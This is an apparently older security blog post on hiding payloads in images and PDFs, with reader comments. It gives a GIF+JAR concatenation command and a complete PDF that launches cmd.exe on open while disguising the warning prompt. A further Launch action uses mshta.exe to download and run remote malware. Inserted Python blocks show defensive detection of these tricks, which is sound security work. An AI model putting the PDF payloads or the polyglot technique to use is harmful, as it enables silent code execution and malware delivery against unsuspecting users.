New Attack Vectors

Lately there has been a real explosion of new attack vectors; today it is really simple to include a malicious payload in a picture, an Office document or a PDF. This kind of weakness affects a very large range of targets and can be used to exploit local applications or web servers with minimal or no user interaction.

Detecting such threats is also not simple, because of the nature of the vulnerability. I will now show a few of these methods applied to real applications and services.

Hide webcode inside a picture (image injection)

Nowadays almost every image format supports tags, either defined by the format itself (GIF, PNG) or by the Exchangeable image file format (JPEG, TIFF). Such tags describe the picture: creation date and time, title, description and extended information associated with a single image. These metadata are used to improve the localization, searchability and semantic interoperability of digital data.

I mention all this because metadata can be an interesting attack vector: in a web scenario it is possible to bypass image verification by adding our payload as metadata. This can be done with any program like Photoshop or GIMP, or with a special tool like jhead. The vulnerability affects only web pages that rely solely on the PHP getimagesize() function; I made a video tutorial a few years ago, which you can find here.

Picture with crafted payload

Another interesting use of image injection is the ability to bind a JAR file to a GIF, JPG or PNG picture. This trick bypasses 99% of server-side checks because image reading software usually parses an image starting from the header of the file, whereas a JAR file, like every ZIP archive, is parsed starting from the footer.

Gif header

Gif footer

We can join a gif with a jar file on windows using this command:

copy /b image.gif+evil.jar craftedimage.gif

(the trick can also be used to hide web code inside a picture)

The result will be a normal GIF file that you can view without problems and, at the same time, a fully functional JAR file. This can lead to the execution of malicious code on the server or on user machines.
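As an added example (not code from the original post), this Python check shows why a header-only validator, which is all getimagesize() amounts to, accepts both the metadata trick and the concatenated GIF+JAR described above, and how a tail-side check catches the appended archive. The sample files and function names are constructed for this example.

```python
import io
import struct
import zipfile

# Magic values for the formats the post discusses.
GIF_HEADERS = (b"GIF87a", b"GIF89a")
GIF_TRAILER = b"\x3b"
ZIP_EOCD = b"PK\x05\x06"          # end-of-central-directory signature
EOCD_MAX_TAIL = 22 + 65535        # fixed EOCD size + maximum comment length


def header_only_check(data: bytes) -> bool:
    """The weak check: accepts anything that starts like a GIF, which is
    effectively what a getimagesize()-style validator does."""
    return data[:6] in GIF_HEADERS


def zip_at_tail(data: bytes) -> bool:
    """ZIP/JAR readers locate the archive from the END of the file, so an
    EOCD record near the tail is the tell-tale of an appended archive."""
    tail = data[-EOCD_MAX_TAIL:]
    if ZIP_EOCD not in tail:
        return False
    return zipfile.is_zipfile(io.BytesIO(data))


def hardened_check(data: bytes) -> bool:
    """Accept a GIF only if it starts with the GIF header, ends with the
    GIF trailer byte and carries no ZIP archive at its tail."""
    return (data[:6] in GIF_HEADERS
            and data.endswith(GIF_TRAILER)
            and not zip_at_tail(data))


def make_samples() -> dict:
    """Constructed inputs: a 1x1 GIF, and the same GIF with a small ZIP
    appended, mimicking 'copy /b image.gif+evil.jar craftedimage.gif'."""
    gif = (b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0x80, 0, 0)
           + b"\x00\x00\x00\xff\xff\xff"                  # 2-colour palette
           + b"\x2c" + struct.pack("<HHHHB", 0, 0, 1, 1, 0)  # image descriptor
           + b"\x02\x02\x44\x01\x00"                        # minimal LZW data
           + GIF_TRAILER)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("hello.txt", "harmless test content")
    return {"clean": gif, "polyglot": gif + buf.getvalue()}
```

Re-encoding an upload with an image library instead of trusting its header discards both appended data and metadata, which covers the EXIF payload case as well.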


PDF as Attack Vector

As far as I know, PDF files are the latest frontier of attack vectors; today it is possible to embed a malicious payload in a PDF document. Before starting, it is necessary to take a look at the format specification.

The picture shows the PDF structure and the workflow.

The Portable Document Format (PDF) supports a number of action commands; I list most of them below.

  • GoTo (to navigate to a destination within the same document)
  • Submit (to send data via HTTP)
  • Launch (to launch system applications)
  • URI (to navigate to a URI via the system browser)
  • Sound (to play a sound)
  • Movie (to play a movie)
  • Hide (to hide the document's annotations)
  • JavaScript (to run JavaScript)

With these action commands it is possible to manipulate a PDF so that it embeds a payload and deceives a user into running it.

Launch system application

The following code launches a local application, with all the risks that entails. I posted a small example below, so you can copy the text and save it as a PDF. The juicy part of the code is object 8. I will always use this skeleton for the later examples.

%PDF-1.1
1 0 obj
<<
/Type /Catalog
/Outlines 2 0 R
/Pages 3 0 R
/OpenAction 8 0 R
>>
endobj
2 0 obj
<<
/Type /Outlines
/Count 0
>>
endobj
3 0 obj
<<
/Type /Pages
/Kids [4 0 R]
/Count 1
>>
endobj
4 0 obj
<<
/Type /Page
/Parent 3 0 R
/MediaBox [0 0 612 792]
/Contents 5 0 R
/Resources
<< /ProcSet 6 0 R
/Font << /F1 7 0 R >>
>>
>>
endobj
5 0 obj
<< /Length 46 >>
stream
BT
/F1 24 Tf
100 700 Td
(Launch cmd and create a file)Tj
ET
endstream
endobj
6 0 obj
[/PDF /Text]
endobj
7 0 obj
<<
/Type /Font
/Subtype /Type1
/Name /F1
/BaseFont /Helvetica
/Encoding /MacRomanEncoding
>>
endobj
8 0 obj
<<
/Type /Action
/S /Launch
/Win
<<
/F (cmd.exe)
/P (/c c:\windows\system32\cmd.exe


Click the "open" button to read the document)
>>
>>
endobj
xref
0 9
0000000000 65535 f
0000000012 00000 n
0000000109 00000 n
0000000165 00000 n
0000000234 00000 n
0000000401 00000 n
0000000505 00000 n
0000000662 00000 n
trailer
<<
/Size 9
/Root 1 0 R
>>
startxref
751
%%EOF

As you can see, I played with the warning message that pops up when you open the PDF, so it is simple to hide our code from the user.

Put javascript inside a pdf

Using the JavaScript action we can add JavaScript code to the PDF.

8 0 obj
<<
/Type /Action
/S /JavaScript
/JS (app.alert({cMsg: 'This is a javascript', nIcon: 3});)
>>
endobj

Malware download via pdf

The Launch action can also be used to download and run malware from the web.

8 0 obj
<<
/Type /Action
/S /Launch
/Win
<<
/F (c:\\windows\\system32\\mshta.exe)
/P ( http://remote.server.com/malware.hta

Click the "open" button to read the document)
>>
>>
endobj

Using mshta.exe it is feasible to execute a remote VBScript disguised as an HTA file. All of this can be done with the Metasploit Framework, which has some interesting modules to embed and convert an EXE into VBScript.
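An added detection example, not part of the original post, covering the Launch, JavaScript and mshta variants above: a Python triage routine that flags the action subtypes from the list, the /OpenAction auto-trigger the skeleton relies on, and the Launch target and parameters. The sample PDF fragments, the function names and the block/review/allow policy are constructed for this example.

```python
import re

# Action subtypes from the post's list; the examples on the page use
# Launch and JavaScript and fire them through the catalog's /OpenAction.
RISKY_ACTIONS = {"Launch", "JavaScript", "URI", "SubmitForm", "ImportData"}


def normalize_names(data: bytes) -> bytes:
    """Decode '#xx' escapes in PDF names (e.g. /#4Caunch -> /Launch) so a
    plain string match is not defeated by name encoding."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)


def scan_pdf(data: bytes) -> dict:
    """Static triage of a PDF byte string: which risky action subtypes
    appear, whether an action is wired to run on open (/OpenAction or /AA),
    and, for Launch, the target file and parameter string."""
    data = normalize_names(data)
    found = {"actions": set(), "auto_trigger": False,
             "launch_file": None, "launch_params": None}
    for m in re.finditer(rb"/S\s*/([A-Za-z]+)", data):
        name = m.group(1).decode("ascii")
        if name in RISKY_ACTIONS:
            found["actions"].add(name)
    found["auto_trigger"] = re.search(rb"/(OpenAction|AA)\b", data) is not None
    if "Launch" in found["actions"]:
        # Literal strings only; escaped parentheses are not handled here.
        f = re.search(rb"/F\s*\(([^)]*)\)", data)
        p = re.search(rb"/P\s*\(([^)]*)\)", data)
        found["launch_file"] = f.group(1).decode("latin-1") if f else None
        found["launch_params"] = p.group(1).decode("latin-1").strip() if p else None
    return found


def verdict(found: dict) -> str:
    """Policy a mail or upload gateway could apply to the findings."""
    if found["actions"] & {"Launch", "JavaScript"} and found["auto_trigger"]:
        return "block"
    return "review" if found["actions"] else "allow"


# Constructed sample mirroring the post's object 8 wired to /OpenAction,
# with the Launch name hex-escaped, plus a clean document for comparison.
SAMPLE_LAUNCH = (b"%PDF-1.1\n1 0 obj\n<< /Type /Catalog /OpenAction 8 0 R >>\nendobj\n"
                 b"8 0 obj\n<< /Type /Action /S /#4Caunch /Win << /F (cmd.exe)\n"
                 b"/P (/c placeholder\n\nClick the open button) >> >>\nendobj\n%%EOF\n")
SAMPLE_CLEAN = b"%PDF-1.1\n1 0 obj\n<< /Type /Catalog /Pages 3 0 R >>\nendobj\n%%EOF\n"
```

The multi-line /P string the post uses to push the real command line out of the reader's warning dialog is recovered whole by the scanner, so the trick that fools the user does not fool the triage.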

Last but not least, don't forget that a payload can also be added to an MS Office DOC or XLS via macros. Fortunately MS Office macros are disabled by default, so be careful when you run them.





2 comments

  1. Hi, I am interested in learning more about how one could actually create an attack vector using the method you describe involving embedding a “jar file” or “webcode” inside an image file. Can you elaborate, or at least point me at some other resource? I am currently doing a pentest at a news media company that allows images to be uploaded.

    thanks

    – Roy

  2. Hi, the payload itself is very simple to build but you need to collect more info about the target in order to find a flaw to bypass the image validation & verification. I can't help you without a proper analysis of the target.
